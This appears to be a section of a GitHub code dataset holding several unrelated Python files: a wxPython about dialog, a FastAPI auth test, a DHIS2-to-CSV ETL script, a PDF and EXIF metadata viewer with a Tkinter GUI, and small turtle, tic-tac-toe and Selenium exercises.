SettingsFrame(BaseSettingsFrame):\n def __init__(self, *args, **kwds):\n kwds[\"style\"] = kwds.get(\"style\", 0)\n BaseSettingsFrame.__init__(self, *args, **kwds)\n self.Bind(wx.EVT_CLOSE, self.on_close)\n\n self.radio_box_theme.SetName('radio_box_theme')\n\n def on_about(self, event):\n program_description = \\\n \"\"\"Quick Subnet Calculator displays additional information calculated from an IP and subnet mask.\"\"\"\n program_license = \\\n \"LGPL-3.0-or-later (GNU Lesser General Public License 3.0 or later)\\n\" \\\n \"See the files COPYING and COPYING.LESSER distributed with this program\\n\" \\\n \"or https://www.gnu.org/licenses/ if you did not receive them with your copy.\"\n info = wx.adv.AboutDialogInfo()\n info.SetIcon(SubnetCalcPNG.GetIcon())\n info.SetName('Quick Subnet Calculator')\n info.SetVersion('1.1')\n info.SetDescription(program_description)\n info.SetCopyright('(C) 2018, 2019 Brandon M. Pace ')\n info.SetWebSite('https://github.com/brandonmpace/Quick-Subnet-Calculator')\n info.SetLicense(program_license)\n # info.AddDeveloper('Brandon M. Pace')\n\n wx.adv.AboutBox(info, parent=self)\n\n def on_close(self, event):\n \"\"\"This function is used to just hide the settings window when the user clicks the close button.\"\"\"\n if event.CanVeto():\n self.Hide()\n event.Veto()\n else:\n event.Skip()\n\n def on_radiobox_theme(self, event):\n self.Parent.apply_theme(event.GetString())\n event.Skip()\n","repo_name":"brandonmpace/Quick-Subnet-Calculator","sub_path":"GUI/SubnetCalcGUI.py","file_name":"SubnetCalcGUI.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14421250107","text":"import pytest\nfrom fastapi import status\n\nfrom .factories import get_fake_user\n\n\n@pytest.mark.anyio\nclass TestAuth:\n\n async def test_auth(self, client):\n\n user = get_fake_user()\n\n response = await client.post(\n '/api/auth/register',\n json=user,\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n\n response = await client.post(\n '/api/auth/login',\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n data={\n 'username': user['username'],\n 'password': user['password'],\n }\n )\n assert response.status_code == status.HTTP_200_OK\n\n cookies = response.cookies\n\n response = await client.post(\n '/api/auth/logout',\n cookies=cookies,\n )\n\n assert response.status_code == status.HTTP_200_OK\n","repo_name":"xristxgod/Crypto-Finance-Dashboard","sub_path":"backend/src/core/users/tests/tests_auth.py","file_name":"tests_auth.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70670498722","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport etl\nimport pandas as pd\nimport requests\nfrom dotenv import load_dotenv\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin\n\nimport credentials\n\netl.LOGGER = etl.logging.get_logger(log_name=\"DHIS2 pivot table pull\", log_group=\"etl\")\n\n\n@etl.decorators.log_start_and_finalisation(\"getting DHIS2 metadata\")\ndef get_metadata(from_pickle=False):\n global category_combos\n global data_elements\n global org_units\n build_dir_ = os.path.join(OUTPUT_DIR_NAME, \"build\")\n os.makedirs(build_dir_, exist_ok=True)\n cc_pickle_path = os.path.join(build_dir_, \"category_combos.pickle\")\n de_pickle_path = os.path.join(build_dir_, \"data_elements.pickle\")\n ou_pickle_path = os.path.join(build_dir_, \"org_units.pickle\")\n p_exist = all(map(os.path.exists, [cc_pickle_path, de_pickle_path, ou_pickle_path]))\n if from_pickle and p_exist:\n category_combos = pd.read_pickle(cc_pickle_path)\n data_elements = pd.read_pickle(de_pickle_path)\n org_units = pd.read_pickle(ou_pickle_path)\n return\n cc_resource = \"categoryOptionCombos?paging=false&fields=id,name\"\n de_resource = \"dataElements?paging=false&fields=id,name\"\n ou_resource = \"organisationUnits?paging=false&fields=id,name\"\n r_cc = __get_dhis2_api_resource(cc_resource)\n r_de = __get_dhis2_api_resource(de_resource)\n r_ou = __get_dhis2_api_resource(ou_resource)\n cc_list = json.loads(r_cc.text)['categoryOptionCombos']\n de_list = json.loads(r_de.text)['dataElements']\n ou_list = json.loads(r_ou.text)['organisationUnits']\n category_combos = pd.DataFrame(cc_list)\n data_elements = pd.DataFrame(de_list)\n org_units = pd.DataFrame(ou_list)\n category_combos.to_pickle(cc_pickle_path)\n data_elements.to_pickle(de_pickle_path)\n org_units.to_pickle(ou_pickle_path)\n\n\n@etl.decorators.log_start_and_finalisation(\"get DHIS2 pivot table data\")\ndef get_dhis2_pivot_table_data(pivot_table_id, from_pickle=False):\n build_dir_ = os.path.join(OUTPUT_DIR_NAME, \"build\")\n os.makedirs(build_dir_, exist_ok=True)\n pt_pickle_path = os.path.join(build_dir_, f\"pivot_table_{pivot_table_id}.pickle\")\n if from_pickle and os.path.exists(pt_pickle_path):\n df = pd.read_pickle(pt_pickle_path)\n return df\n dhis2_pivot_table_resource = __get_dhis2_table_api_resource(pivot_table_id)\n r_pt = __get_dhis2_api_resource(dhis2_pivot_table_resource)\n json_pt = json.loads(r_pt.text)\n df = pd.DataFrame(json_pt['dataValues'])\n df.to_pickle(pt_pickle_path)\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"export category config\")\ndef export_category_config(df: pd.DataFrame) -> pd.DataFrame:\n categories_names = df['categoryOptionCombo'].replace(category_combos.set_index('id')['name'])\n categories_ids = df['categoryOptionCombo']\n categories_map = pd.DataFrame()\n categories_map['name'] = categories_names\n categories_map['id'] = categories_ids\n categories_map = categories_map.drop_duplicates(subset='id')\n\n data_elements_names = df['dataElement'].replace(data_elements.set_index('id')['name'])\n data_elements_ids = df['dataElement']\n data_elements_map = pd.DataFrame()\n data_elements_map['name'] = data_elements_names\n data_elements_map['id'] = data_elements_ids\n data_elements_map = data_elements_map.drop_duplicates(subset='id')\n\n config_output_dir = os.path.join(OUTPUT_DIR_NAME, \"configs\")\n os.makedirs(config_output_dir, exist_ok=True)\n with open(os.path.join(config_output_dir, f\"{TABLE_TYPE}_category_config.json\"), 'w') as f:\n f.write(\"[\")\n first = True\n for i, row in categories_map.iterrows():\n if not first:\n f.write(',')\n else:\n first = False\n line = f'''\n{{\n \"id\": \"{row[\"id\"]}\",\n \"name\": \"{row[\"name\"]}\",\n \"mapping\": {{\n \"age_group\": \"\",\n \"sex\": \"\"\n }}\n}}'''\n f.write(line)\n f.write(\"\\n]\\n\")\n with open(os.path.join(config_output_dir, f\"{TABLE_TYPE}_column_config.json\"), 'w') as f:\n f.write(\"[\")\n first = True\n for i, row in data_elements_map.iterrows():\n if not first:\n f.write(',')\n else:\n first = False\n line = f'''\n{{\n \"id\": \"{row[\"id\"]}\",\n \"name\": \"{row[\"name\"]}\",\n \"mapping\": \"\",\n \"categoryMapping\": {{\n \"age_group\": \"\",\n \"sex\": \"\"\n }}\n}}'''\n f.write(line)\n f.write(\"\\n]\\n\")\n\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"extract data elements names\")\ndef extract_data_elements_names(df: pd.DataFrame) -> pd.DataFrame:\n df['dataElementName'] = df['dataElement']\n if PROGRAM_DATA_COLUMN_CONFIG:\n de_id_map = {}\n for column_config_filename in PROGRAM_DATA_COLUMN_CONFIG.split(','):\n with open(column_config_filename, 'r') as f:\n program_config = json.loads(f.read())\n for config_ in program_config:\n mapping = config_.get('mapping')\n if not mapping:\n continue\n elif type(mapping) != list:\n mapping = [mapping]\n de_id_map[config_['id']] = mapping\n extra_rows = pd.DataFrame(columns=list(df))\n for i, row in df.iterrows():\n de_id = row['dataElementName']\n mappings = de_id_map.get(de_id, [])\n if len(mappings) == 0:\n continue\n df.loc[i, 'dataElementName'] = mappings[0]\n if len(mappings) > 1:\n for mapping in mappings[1:]:\n extra_row = row.copy()\n extra_row['dataElementName'] = mapping\n extra_rows = extra_rows.append(extra_row)\n df = df.append(extra_rows, ignore_index=True)\n\n # use default dhis2 de names for ids not in config\n df['dataElementName'] = df['dataElementName'].replace(data_elements.set_index('id')['name'])\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"extract areas names\")\ndef extract_areas_names(df: pd.DataFrame) -> pd.DataFrame:\n df['area_id'] = df['orgUnit']\n df['area_name'] = df['orgUnit'].replace(org_units.set_index('id')['name'])\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"sort by area name\")\ndef sort_by_area_name(df: pd.DataFrame) -> pd.DataFrame:\n return df.sort_values(by=['area_name', 'period']).reset_index(drop=True)\n\n\n@etl.decorators.log_start_and_finalisation(\"extract categories and aggregate data\")\ndef extract_categories_and_aggregate_data(df: pd.DataFrame) -> pd.DataFrame:\n category_mapping = {}\n for category_config_filename in PROGRAM_DATA_CATEGORY_CONFIG.split(','):\n with open(category_config_filename, 'r') as f:\n category_config = json.loads(f.read())\n map_ = {x['id']: x.get('mapping', {}) for x in category_config}\n category_mapping.update(map_)\n if PROGRAM_DATA_COLUMN_CONFIG:\n column_categories_map = {}\n for column_config_filename in PROGRAM_DATA_COLUMN_CONFIG.split(','):\n with open(column_config_filename, 'r') as f:\n column_config = json.loads(f.read())\n map_ = {x['id']: x.get('categoryMapping') for x in column_config}\n column_categories_map.update(map_)\n else:\n column_categories_map = {}\n categories_to_remove = set([x['id'] for x in category_config if bool(x.get('remove'))])\n df = df.loc[~df['categoryOptionCombo'].isin(categories_to_remove)]\n metadata_cols = ['area_id', 'area_name', 'period']\n for i, row in df.iterrows():\n category_id = row['categoryOptionCombo']\n de_id = row['dataElement']\n categories = column_categories_map.get(de_id) or category_mapping[category_id]\n for c_name, c_value in categories.items():\n if c_name not in metadata_cols:\n metadata_cols.append(c_name)\n df.loc[i, c_name] = c_value\n\n df['value'] = pd.to_numeric(df['value'], errors='coerce', downcast='integer')\n df[metadata_cols] = df[metadata_cols].fillna('')\n\n aggregated_rows = df[metadata_cols + ['dataElementName', 'value']].groupby(metadata_cols + ['dataElementName']).sum().reset_index()\n pivot = aggregated_rows.pivot(columns='dataElementName', values='value')\n semi_wide_format_df = pd.concat([aggregated_rows[metadata_cols], pivot], axis=1)\n\n data_cols = [x for x in semi_wide_format_df if x not in set(metadata_cols)]\n\n joined_rows = semi_wide_format_df.copy().drop_duplicates(subset=metadata_cols).set_index(metadata_cols)\n for i, row in semi_wide_format_df.iterrows():\n index = list(row[metadata_cols].values)\n for col_name, val in row[data_cols].items():\n if pd.notna(val):\n joined_rows.loc[tuple(index), col_name] = val\n output_df = joined_rows.reset_index()\n return output_df\n\n\n@etl.decorators.log_start_and_finalisation(\"trimming period strings\")\ndef trim_period_strings(df: pd.DataFrame) -> pd.DataFrame:\n df['period'] = df['period'].str[:4]\n df = df.rename(columns={'period': 'year'})\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"map dhis2 id to area id\")\ndef map_dhis2_id_area_id(df: pd.DataFrame) -> pd.DataFrame:\n if AREA_ID_MAP:\n area_id_df = pd.read_csv(AREA_ID_MAP, index_col=False)\n if 'map_id' in list(area_id_df):\n mapping_column_name = 'map_id'\n else:\n mapping_column_name = 'dhis2_id'\n df['area_id'] = df['area_id'].replace(area_id_df.set_index(mapping_column_name)['area_id'])\n return df\n\n\ndef __get_dhis2_api_resource(resource):\n r = requests.get(urljoin(DHIS2_URL, resource), auth=HTTPBasicAuth(DHIS2_USERNAME, DHIS2_PASSWORD))\n etl.requests_util.check_if_response_is_ok(r)\n return r\n\n\ndef __fetch_pivot_table_details(dhis2_pivot_table_id):\n reportTableReport = f\"reportTables/{dhis2_pivot_table_id}\"\n rt_r = __get_dhis2_api_resource(reportTableReport)\n return json.loads(rt_r.text)\n\n\ndef __get_dhis2_table_api_resource(pivot_table_id):\n pivot_table_metadata = __fetch_pivot_table_details(pivot_table_id)\n dimensions_dx = [x['dataElement']['id'] for x in pivot_table_metadata['dataDimensionItems'] if x['dataDimensionItemType'] == \"DATA_ELEMENT\"]\n ou_elms = [x['id'] for x in pivot_table_metadata['organisationUnits']]\n ou_level = [f\"LEVEL-{x!r}\" for x in pivot_table_metadata.get('organisationUnitLevels', [])]\n periods = [x['id'] for x in pivot_table_metadata['periods']]\n if len(dimensions_dx) < 1:\n raise ValueError(f\"No data elements configured for pivot table {pivot_table_id}\")\n if len(ou_elms + ou_level) < 1:\n raise ValueError(f\"No org units configured for pivot table {pivot_table_id}\")\n if len(periods) < 1:\n raise ValueError(f\"No periods configured for pivot table {pivot_table_id}\")\n pivot_table_resource = f\"analytics/dataValueSet.json?\" \\\n f\"dimension=dx:{';'.join(dimensions_dx)}&\" \\\n f\"dimension=co&\" \\\n f\"dimension=ou:{';'.join(ou_elms + ou_level)}&\" \\\n f\"dimension=pe:{';'.join(periods)}&\" \\\n f\"displayProperty=NAME\"\n return pivot_table_resource\n\n\ndef run_pipeline(input_df):\n return (input_df\n .pipe(extract_data_elements_names)\n .pipe(extract_areas_names)\n .pipe(extract_categories_and_aggregate_data)\n .pipe(sort_by_area_name)\n .pipe(map_dhis2_id_area_id)\n .pipe(trim_period_strings)\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Pull geo data from a DHIS2 to be uploaded into ADR.')\n argv = sys.argv[1:]\n parser.add_argument('-e', '--env-file',\n default='.env',\n help='env file to read config from')\n parser.add_argument('-p', '--pickle',\n dest='pickle',\n action='store_true',\n help='fetch data from local pickle instead http call to DHIS2')\n parser.add_argument('-t', '--pivot-table-config',\n dest='pt_config',\n action='store_true',\n help='fetch pivot table configuration data from DHIS2')\n args = parser.parse_args()\n\n load_dotenv(args.env_file)\n EXPORT_NAME = os.environ.get('OUTPUT_DIR_NAME', 'default')\n OUTPUT_DIR_NAME = f\"output/{EXPORT_NAME}\"\n DHIS2_URL = os.getenv(\"DHIS2_URL\")\n credentials.read_credentials(os.getenv(\"DHIS2_CREDENTIALS_FILE\"))\n DHIS2_USERNAME = os.getenv(\"DHIS2_USERNAME\")\n DHIS2_PASSWORD = os.getenv(\"DHIS2_PASSWORD\")\n PROGRAM_DATA = os.getenv('PROGRAM_DATA')\n PROGRAM_DATA_CATEGORY_CONFIG = os.getenv(\"PROGRAM_DATA_CATEGORY_CONFIG\")\n # Legacy env name support\n if not PROGRAM_DATA_CATEGORY_CONFIG:\n PROGRAM_DATA_CATEGORY_CONFIG = os.getenv(\"PROGRAM_DATA_CONFIG\")\n PROGRAM_DATA_COLUMN_CONFIG = os.getenv(\"PROGRAM_DATA_COLUMN_CONFIG\")\n AREA_ID_MAP = os.getenv(\"AREA_ID_MAP\")\n\n get_metadata(from_pickle=args.pickle)\n tables = json.loads(PROGRAM_DATA)\n if args.pt_config:\n for table in tables:\n TABLE_TYPE = table['name']\n etl.LOGGER.info(f\"Starting fetching metadata for table \\\"{TABLE_TYPE}\\\"\")\n dhis2_pivot_table_id = table['dhis2_pivot_table_id']\n (get_dhis2_pivot_table_data(dhis2_pivot_table_id, from_pickle=args.pickle)\n .pipe(export_category_config)\n )\n etl.LOGGER.info(f\"Finished fetching metadata for table \\\"{TABLE_TYPE}\\\"\")\n else:\n for table in tables:\n TABLE_TYPE = table['name']\n etl.LOGGER.info(f\"Starting data fetch for table \\\"{TABLE_TYPE}\\\"\")\n dhis2_pivot_table_id = table['dhis2_pivot_table_id']\n input_df = get_dhis2_pivot_table_data(dhis2_pivot_table_id, from_pickle=args.pickle)\n out = run_pipeline(input_df)\n output_file_path = os.path.join(OUTPUT_DIR_NAME, 'program', f\"{EXPORT_NAME}_dhis2_pull_{TABLE_TYPE}.csv\")\n etl.LOGGER.info(f\"Saving \\\"{TABLE_TYPE}\\\" data to file {output_file_path}\")\n os.makedirs(os.path.join(OUTPUT_DIR_NAME, 'program'), exist_ok=True)\n out.to_csv(output_file_path, index=None, float_format='%.f')\n etl.LOGGER.info(f\"Finished processing table \\\"{TABLE_TYPE}\\\"\")\n","repo_name":"fjelltopp/unaids_etl","sub_path":"adr_dhis2_pivot_table_etl.py","file_name":"adr_dhis2_pivot_table_etl.py","file_ext":"py","file_size_in_byte":14539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30588322263","text":"#IMPORTING LIBRARY\nimport os\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom GPSPhoto import gpsphoto\nimport datetime\nfrom io import StringIO\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\nimport tkinter as tk\nimport tkinter.font as tkFont\nfrom tkinter import filedialog\nimport olefile\nimport docx\n##### PDF TYPE METADATA #####\n\n# # Open the Word document\n# filename = \"C:/Users/User/Desktop/Degree/ITT632/ITT632-Project-CS251.doc\"\n# ole = olefile.OleFileIO(filename)\n\n# # Get the metadata\n# info = ole.get_metadata()\n\n# # Print the metadata\n# print(info.keys())\n# # print(\"Author:\", info.author.decode('ISO-8859-1'))\n# # print(\"Created:\", info.create_time)\n# # print(\"Modified:\", info.last_saved_time)\n# # print(\"Subject:\", info.subject.decode('utf-8'))\n# # print(\"Title:\", info.title.decode('ISO-8859-1'))\n\n# # Close the file\n# ole.close()\n\ndef extract_pdf_metadata(path):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, laparams=laparams)\n\n with open(path, 'rb') as fp:\n parser = PDFParser(fp)\n doc = PDFDocument(parser)\n return doc.info\n\ndef parse_creation_date(creation_date_str):\n # creation_date_str = creation_date_str.decode('utf-8')\n date_format = 'D:%Y%m%d%H%M%S'\n creation_date = datetime.datetime.strptime(creation_date_str[:16], date_format)\n return creation_date.strftime('%Y-%m-%d %H:%M:%S')\n\ndef parse_modification_date(mod_date_str):\n date_format = 'D:%Y%m%d%H%M%S'\n mod_date = datetime.datetime.strptime(mod_date_str[:16], date_format)\n return mod_date.strftime('%Y-%m-%d %H:%M:%S')\n\ndef pdf_metadata(file_path):\n pdf_file = file_path\n \n info = extract_pdf_metadata(pdf_file)\n creation_date_str = info[0].get('CreationDate', '')\n creation_date_str = creation_date_str.decode('utf-8')\n creation_date = parse_creation_date(creation_date_str)\n\n mod_date_str = info[0].get('ModDate','')\n mod_date_str = mod_date_str.decode('ISO-8859-1')\n mod_date = parse_modification_date(mod_date_str)\n \n print(\"THE PDF METADATA IS AT BELOW\")\n for i in info:\n print('File Name\\t\\t : ' + pdf_file)\n print('Author of PDF\\t\\t : ' + i['Author'].decode('ISO-8859-1'))\n print('Creation Date\\t\\t : ' + creation_date)\n if 'Creator' in i:\n print('Creator of PDF\\t\\t : ' + i['Creator'].decode('ISO-8859-1'))\n print('Modification Date\\t : ' + mod_date)\n print('Producer\\t\\t : ' + i['Producer'].decode('ISO-8859-1'))\n\n\n#### IMAGE TYPE METADATA #####\n\n# path to the image or video\ndef image_metadata(file_path):\n imagename = file_path\n\n # read the image data using PIL\n image = Image.open(imagename)\n\n\n # extract other basic metadata\n info_dict = {\n \"Filename\": image.filename,\n \"Image Size\": image.size,\n \"Image Height\": image.height,\n \"Image Width\": image.width,\n \"Image Format\": image.format,\n \"Image Mode\": image.mode,\n \"Image is Animated\": getattr(image, \"is_animated\", False),\n \"Frames in Image\": getattr(image, \"n_frames\", 1)\n }\n\n for label,value in info_dict.items():\n print(f\"{label:25}: {value}\")\n\n # extract EXIF data\n exifdata = image.getexif()\n\n # iterating over all EXIF data fields\n for tag_id in exifdata:\n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n # decode bytes \n if isinstance(data, bytes):\n data = data.decode()\n print(f\"{tag:25}: {data}\")\n\n data = gpsphoto.getGPSData(imagename)\n if(data):\n print(\"GPS Info\\t\\t :\" )\n print(\"Latitude \\t\\t : \",data['Latitude'])\n print(\"Longitude \\t\\t : \", data['Longitude'])\n print(\"Google Map link \\t : https://www.google.com/maps/search/?api=1&query=\"+str(data['Latitude'])+\",\"+str(data['Longitude']))\n else:\n print('This file doesnt have GPS')\n \n\nclass App:\n def __init__(self, root):\n #setting title\n root.title(\"Metdata Extraction Tools\")\n #setting window size\n width=637\n height=311\n screenwidth = root.winfo_screenwidth()\n screenheight = root.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n root.geometry(alignstr)\n root.resizable(width=False, height=False)\n\n GLabel_806=tk.Label(root)\n GLabel_806[\"cursor\"] = \"arrow\"\n ft = tkFont.Font(family='Times',size=20)\n GLabel_806[\"font\"] = ft\n GLabel_806[\"fg\"] = \"#333333\"\n GLabel_806[\"justify\"] = \"center\"\n GLabel_806[\"text\"] = \"Metadata Extractor\"\n GLabel_806.place(x=0,y=20,width=631,height=46)\n\n enter_file_button=tk.Label(root)\n ft = tkFont.Font(family='Times',size=10)\n enter_file_button[\"font\"] = ft\n enter_file_button[\"fg\"] = \"#333333\"\n enter_file_button[\"justify\"] = \"center\"\n enter_file_button[\"text\"] = \"Enter file\"\n enter_file_button.place(x=120,y=150,width=88,height=41)\n\n submit_file_button=tk.Button(root)\n submit_file_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n submit_file_button[\"font\"] = ft\n submit_file_button[\"fg\"] = \"#000000\"\n submit_file_button[\"justify\"] = \"center\"\n submit_file_button[\"text\"] = \"Submit\"\n submit_file_button.place(x=330,y=230,width=70,height=25)\n submit_file_button[\"command\"] = self.submit_file_button_command\n\n cancel_button=tk.Button(root)\n cancel_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n cancel_button[\"font\"] = ft\n cancel_button[\"fg\"] = \"#000000\"\n cancel_button[\"justify\"] = \"center\"\n cancel_button[\"text\"] = \"Cancel\"\n cancel_button.place(x=250,y=230,width=70,height=25)\n cancel_button[\"command\"] = self.cancel_button_command\n\n find_file_button=tk.Button(root)\n find_file_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n find_file_button[\"font\"] = ft\n find_file_button[\"fg\"] = \"#000000\"\n find_file_button[\"justify\"] = \"center\"\n find_file_button[\"text\"] = \"Find file\"\n find_file_button.place(x=470,y=150,width=62,height=38)\n find_file_button[\"command\"] = upload_file\n\n file_location_placeholder=tk.Label(root)\n ft = tkFont.Font(family='Times',size=10)\n file_location_placeholder[\"font\"] = ft\n file_location_placeholder[\"fg\"] = \"#333333\"\n file_location_placeholder[\"justify\"] = \"center\"\n self.file_location_placeholder=tk.Label(root)\n file_location_placeholder[\"relief\"] = \"sunken\"\n file_location_placeholder[\"borderwidth\"] = 2\n file_location_placeholder.place(x=200,y=150,width=265,height=36)\n # file_location_placeholder.config(text=\"file path\")\n\n def submit_file_button_command(self):\n \n find_file_type()\n\n def cancel_button_command(self):\n file_path = \" \"\n print(\"cancel\")\n\n\n def find_file_button_command():\n upload_file()\n \ndef show_popup_data(file_path):\n popup = tk.Toplevel()\n popup.title(\"Pop-up Window\")\n text = tk.Text(popup, text=find_file_type())\n button = tk.Button(popup, text=\"OK\", command=popup.destroy)\n output = image_metadata(file_path)\n text.pack(fill=tk.BOTH, expand=True)\n # Insert the output into the Text widget\n text.insert(tk.END, output)\n button.pack()\n\ndef show_popup_error():\n popup = tk.Toplevel()\n popup.title(\"Pop-up Window\")\n label = tk.Label(popup, text=\"Must Insert Valid File\")\n button = tk.Button(popup, text=\"OK\", command=popup.destroy)\n label.pack(fill=tk.BOTH, expand=True)\n button.pack()\n\ndef upload_file():\n global file_path \n file_path = filedialog.askopenfilename()\n\n print(file_path)\n main_window_instance.file_location_placeholder.config(text=file_path)\n # print(file_path)\n\ndef find_file_type():\n # print(\"File path: \",file_path)\n _, file_extension = os.path.splitext(file_path)\n file_extension = file_extension.lower()\n # file_path_extension = file_path.lower()\n\n if file_extension == '.pdf':\n # show_popup_data(file_path)\n pdf_metadata(file_path)\n elif file_extension == '.doc':\n print('doc')\n elif file_extension == '.jpg' or file_extension == '.png' or file_extension== '.jpeg' or file_extension == '.gif' or file_extension=='.jfif':\n return image_metadata(file_path)\n # add other file types as needed\n else:\n show_popup_error()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n main_window_instance = App(root)\n app = App(root)\n root.mainloop()\n\n## buat report based on the metadata\n## banyakkan file type\n## output ke .txt\n","repo_name":"dualspx/simple-exiftool-gui","sub_path":"Exiftools.py","file_name":"Exiftools.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12991711415","text":"from turtle import Turtle, Screen;\nimport random\n\nscreen = Screen()\n\n\nscreen.setup(width=500,height=400)\nuser_bet = screen.textinput(title=\"make your bet\", prompt=\"What is your bet color? \")\n\ncolors= ['red','green','yellow']\n\nall_turtle=[]\n \n \nfor turtle_index in range(0,3):\n tim = Turtle(shape='turtle')\n tim.color(colors[turtle_index])\n tim.penup()\n tim.goto(x=-230,y=-50+(turtle_index *30))\n all_turtle.append(tim)\n \nis_race_on = False\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for turtle in all_turtle:\n if turtle.xcor() >230:\n wining_color = turtle.pencolor()\n if wining_color == user_bet:\n print(f'You won, The {wining_color} turtle is the winnser')\n is_race_on = False\n else:\n print(f'You Lose, The {wining_color} turtle is the winnser')\n is_race_on = False\n else:\n turtle.forward(random.randint(0,10))\n\n\n\n\n\n\nscreen.exitonclick()","repo_name":"Techharik/100_python_interm","sub_path":"day19/day19_1.py","file_name":"day19_1.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3901249281","text":"#!/usr/bin/python3\n\nfrom collections import namedtuple\nfrom os import system\nfrom random import randint\nfrom time import sleep\n\n\ndef check_game_state():\n game_over = False\n winner = is_winner()\n if winner:\n clear_screen()\n draw_board()\n print(f\"Congratulations {winner}, you are the winner!\")\n game_over = True\n if not winner and len(remaining_spaces) == 0:\n clear_screen()\n draw_board()\n print(\"It's a tie.\")\n game_over = True\n if game_over:\n play_again = input(\"\\nDo you want to play again [Y/N]? \")\n if play_again.casefold() == \"y\":\n return (True, \"y\")\n else:\n return (False, \"n\")\n return (True, \"n\")\n\n\ndef clear_screen():\n system(\"clear\")\n\n\ndef draw_board():\n rows = [\n \"\\n | | \", f\"\\n {board['7']} | {board['8']} | {board['9']} \", \"\\n | | \",\n \"\\n\", \"-\" * 18,\n \"\\n | | \", f\"\\n {board['4']} | {board['5']} | {board['6']} \", \"\\n | | \",\n \"\\n\", \"-\" * 18,\n \"\\n | | \", f\"\\n {board['1']} | {board['2']} | {board['3']} \", \"\\n | | \",\n \"\\n\" * 2\n ]\n for row in rows:\n print(row, end=\"\")\n\n\ndef get_player_information(player_number):\n name = input(f\"Player {player_number}, please enter your name: \")\n mark = input(f\"{name}, please choose your mark [{'/'.join(marks)}]: \")\n marks.remove(mark)\n return Player(player_number, name, mark)\n\n\ndef is_winner():\n if look_for_winning_combination(current_player.mark) == \"Found!\":\n return current_player.name\n else:\n return None\n\n\ndef look_for_winning_combination(mark):\n winning_combinations = [\n [\"1\", \"2\", \"3\"], [\"1\", \"4\", \"7\"], [\"1\", \"5\", \"9\"], [\"2\", \"5\", \"8\"],\n [\"3\", \"5\", \"7\"], [\"3\", \"6\", \"9\"], [\"4\", \"5\", \"6\"], [\"7\", \"8\", \"9\"]\n ]\n marked_spaces = list(filter(lambda key: board[key] == mark, board.keys()))\n for winning_combination in winning_combinations:\n for space in winning_combination:\n if space not in marked_spaces:\n break\n else:\n return \"Found!\"\n return \"Not found.\"\n\n\ndef place_mark(mark, space):\n board[space] = f\"{mark}\"\n remaining_spaces.pop()\n\n\ndef randomly_pick_starting_player():\n return player_1 if randint(1, 2) == 1 else player_2\n\n\ndef start_game():\n empty_board = {\n \"7\": \" \", \"8\": \" \", \"9\": \" \",\n \"4\": \" \", \"5\": \" \", \"6\": \" \",\n \"1\": \" \", \"2\": \" \", \"3\": \" \",\n }\n empty_spaces = [\" \"] * 9\n starting_player = randomly_pick_starting_player()\n print(f\"\\n{starting_player.name} will have the opening move.\")\n sleep(5)\n return (True, \"n\", empty_board, empty_spaces, starting_player)\n\n\ndef switch_player():\n return player_2 if current_player == player_1 else player_1\n\n\nPlayer = namedtuple(\"Player\", [\"number\", \"name\", \"mark\"])\nmarks = [\"O\", \"X\"]\nplayer_1 = get_player_information(\"1\")\nplayer_2 = get_player_information(\"2\")\n\nplay, play_again, board, remaining_spaces, current_player = start_game()\n\nwhile play:\n clear_screen()\n draw_board()\n space = input(f\"{current_player.name}, where do you want to place {current_player.mark} [1-9]? \")\n place_mark(current_player.mark, space)\n play, play_again = check_game_state()\n if not play:\n continue\n if play_again == \"y\":\n play, play_again, board, remaining_spaces, current_player = start_game()\n continue\n current_player = switch_player()\n","repo_name":"martinvrba/complete-python-bootcamp","sub_path":"Milestone_Project_1/mp1_main.py","file_name":"mp1_main.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22299915847","text":"from time import time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service #here service is a object\nfrom selenium.webdriver.common.by import By\nimport time\n#service is a class\nservice_obj = Service(\"D:\\Automation\\Selenium_Python_Udemy\\drivers\\chromedriver.exe\")\ndriver = webdriver.Chrome(service=service_obj)\n\ndriver.maximize_window()\n\n# driver.get(\"https://rahulshettyacademy.com/dropdownsPractise/\")\n# time.sleep(5)\n# driver.find_element(By.ID,\"autosuggest\").send_keys(\"ind\")\n# time.sleep(2)\n# # 